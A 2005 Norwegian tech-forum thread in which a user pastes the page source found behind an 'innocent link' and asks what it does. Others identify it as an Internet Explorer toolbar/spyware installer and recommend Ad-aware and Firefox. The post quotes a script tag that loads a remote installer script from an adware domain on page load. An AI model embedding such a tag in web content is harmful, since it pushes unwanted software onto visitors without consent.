realfingolfin Skrevet 6. mars 2005 Skrevet 6. mars 2005 Jeg tryket på en "uskyldig link" og dette kom i den tomme siden. (vis kilde sef) <!-- AUTO_PROMPT AD START --> <script language='JavaScript' type='text/JavaScript' src='http://install.xxxtoolbar.com/ist/scripts/prompt.php?retry=2&loadfirst=1&delayload=0&account_id=157515&recurrence=always&adid=a1106272575&event_type=onload'></script> <script language="JavaScript">self.focus();</script> <!-- AUTO_PROMPT AD END --> Plutselig funker ingen av spillene mine.
realfingolfin Skrevet 6. mars 2005 Forfatter Skrevet 6. mars 2005 Åja. feilpostet? Egentlig ikke. Lurte på om guruene kunne si meg hva skriptet gjør/er.
Prodigy_ Skrevet 6. mars 2005 Skrevet 6. mars 2005 Hva har dette med Web-design, HTML og CSS å gjøre?
Mads-b Skrevet 6. mars 2005 Skrevet 6. mars 2005 Tror den installerer en xxx toolbar til Internet Explorer. Tror ikke dette har noe med spillene dine å gjøre. Kjør en spyware scan bare for å være sikker du..
realfingolfin Skrevet 6. mars 2005 Forfatter Skrevet 6. mars 2005 Last ned Ad-aware. Kjør scan. Takk det hjalp Men det er drit vanskelig å fjerne istbar.
jorgis Skrevet 6. mars 2005 Skrevet 6. mars 2005 Av rein nysgjerrighet prøvde jeg å laste ned og få tak i kildekoden til den greien der. Hadde store problemer med å få vist den, siden NOD32 ikke ville la meg kjøre et virus (logisk nok), selv om jeg bare skulle vise kilden (wget fra en linux-boks). Når jeg tok en titt på den, var det mye activeX-kall til en .cab-fil elns. ett eller annet sted på nettet. IE er jo såpass smart at den installerer slikt uten å protestere. *surfe videre med Firefox*
_Adler_ Skrevet 7. mars 2005 Skrevet 7. mars 2005 Men det er drit vanskelig å fjerne istbar. Finnes vell en del poster om dette her fra før. Du kan jo drite i IE og gå over til å bruke Firefox eller Opera. Anbefaler Firefox
Jubelsau Skrevet 25. mars 2005 Skrevet 25. mars 2005 Hva har dette med Web-design, HTML og CSS å gjøre? Ehhh...? Hæ?
_Adler_ Skrevet 25. mars 2005 Skrevet 25. mars 2005 Hei! Denne tråden var vell før en gang postet i Web-design, HTML og CSS hvis jeg forstår rett nå
Anbefalte innlegg
Opprett en konto eller logg inn for å kommentere
Du må være et medlem for å kunne skrive en kommentar
Opprett konto
Det er enkelt å melde seg inn for å starte en ny konto!
Start en kontoLogg inn
Har du allerede en konto? Logg inn her.
Logg inn nå